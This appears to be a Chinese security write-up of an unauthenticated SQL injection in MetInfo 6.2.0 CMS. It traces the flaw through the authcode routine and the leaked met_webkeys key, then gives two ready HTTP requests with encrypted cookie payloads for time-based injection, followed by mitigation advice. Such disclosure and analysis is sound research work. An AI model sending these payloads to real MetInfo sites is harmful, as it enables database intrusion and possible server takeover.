metinfo 6.2.0最新版本前台注入漏洞

https://nosec.org/home/detail/2436.html

https://xz.aliyun.com/t/4508

漏洞环境：

docker pull zksmile/vul:metinfov6.2.0

概述:

看到某个表哥发的metinfo 6.1.3最新注入（https://xz.aliyun.com/t/4508)，以前我发过metinfo利用注入getshell的文章，这里正好可以结合。（https://nosec.org/home/detail/2324.html)，在检查官方发布的最新版6.2.0版本的时候，发现该漏洞并未修复。

利用条件

前台，（https://xz.aliyun.com/t/4508 ）作者在这里说需要注册会员，其实有一处不需要。

漏洞详情

这里关键点在auth类的encode()和decode()方法。看下代码：

class auth {

    public $auth_key;

    public function __construct() {

        global $_M;

        $this->auth_key = $_M['config']['met_webkeys'];

    }

    public function decode($str, $key = ''){

        return $this->authcode($str, 'DECODE', $this->auth_key.$key);

    }

    public function encode($str, $key = '', $time = 0){

        return $this->authcode($str, 'ENCODE', $this->auth_key.$key, $time);

    }

这里两个方法全都调用了authcode()方法，跟进authcode看一下：

public function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0){

        $ckey_length = 4;  

        $key = md5($key ? $key : UC_KEY);

        $keya = md5(substr($key, 0, 16));

        $keyb = md5(substr($key, 16, 16));

        $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

        $cryptkey = $keya.md5($keya.$keyc);

        $key_length = strlen($cryptkey);

        $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;

        $string_length = strlen($string);

        $result = '';

        $box = range(0, 255);

        $rndkey = array();

        for($i = 0; $i <= 255; $i++) {

            $rndkey[$i] = ord($cryptkey[$i % $key_length]);

        }

        for($j = $i = 0; $i < 256; $i++) {

            $j = ($j + $box[$i] + $rndkey[$i]) % 256;

            $tmp = $box[$i];

            $box[$i] = $box[$j];

            $box[$j] = $tmp;

        }

        for($a = $j = $i = 0; $i < $string_length; $i++) {

            $a = ($a + 1) % 256;

            $j = ($j + $box[$a]) % 256;

            $tmp = $box[$a];

            $box[$a] = $box[$j];

            $box[$j] = $tmp;

            $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

        }

        if($operation == 'DECODE') {

            if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {

               return substr($result, 26);

            } else {

               return '';

            }

        }else{

            return $keyc.str_replace('=', '', base64_encode($result));

        }

    }

这里decode和encode算法可逆，但我们需要知道$key的值，查看构造函数：

    public function __construct() {

        global $_M;

        $this->auth_key = $_M['config']['met_webkeys'];

    }

这里$key的值是来源于met_webkeys这个配置，查看met_webkeys来源发现在安装的时候把这个key写入到./config/config_safe.php文件中。

image.png

查看/config/config_safe.php文件，这里写入方式类似以下，但p牛在某篇文章中说过，这种是无法解析的，php后面必须要有一个空白字符，右键查看源代码即可得到met_webkeys，但有的会报错，根据这个表哥所说和php线程安全有关，本地试了下好像是这样。

image.png

image.png

这里有两个利用点，简单说下其中一个。在register类的doemailvild()方法中，这里把用户提交的p参数进行了解密，并且传入到了get_user_valid()方法中。

image.png

查看get_user_valid()方法，这里又把解密后的值传入到了get_user_by_username()方法。

image.png

查看get_user_by_username()方法，又传入了get_user_by_nameid()方法。

image.png

查看get_user_by_nameid()方法，直接拼接。

image.png

这里基本就清楚了，将auth类的authcode()方法copy本地。

image.png

访问本地文件得到加密后的字符串。

image.png

将加密后的字符串放到cookie，get或者post中，构造请求提交，延时注入成功。

payload

复现时需要注意的点：

1、php.ini中 short_open_tag=off

2、不管需不需要登录，最起码需要网站有一个会员存在。

image.png

这里有两个，一个是不需要登陆就可注入，另一个是coolcat表哥所说的需要以会员登陆。以下请自行替换p参数。

1、不需要登陆

GET /admin/index.php?n=user&m=web&c=register&a=doemailvild HTTP/1.1

Cookie: p=00c7%2FDBwD23b41olxVCthTvDDTRBhldmrrdyA8S3t%2F3yAl4QZ0P%2FSfOS5zlB

2、 需要登陆

GET /admin/index.php?n=user&m=web&c=profile&a=dosafety_emailadd HTTP/1.1

Cookie: p=497cD9UpkDtsvFzU9IKNlPvSyg1z%2bf09cmp8hqUeyJW9ekvPfJqx8cLKFSHr;<自行添加登陆后的cookie>

修复方案

目前官网没有更新相关补丁。

白帽汇安全研究院建议限制config_safe.php的访问权限来进行应急修复。

Apache配置.htaccess文件：

image.png

Nginx在nginx.conf文件添加以下配置：

image.png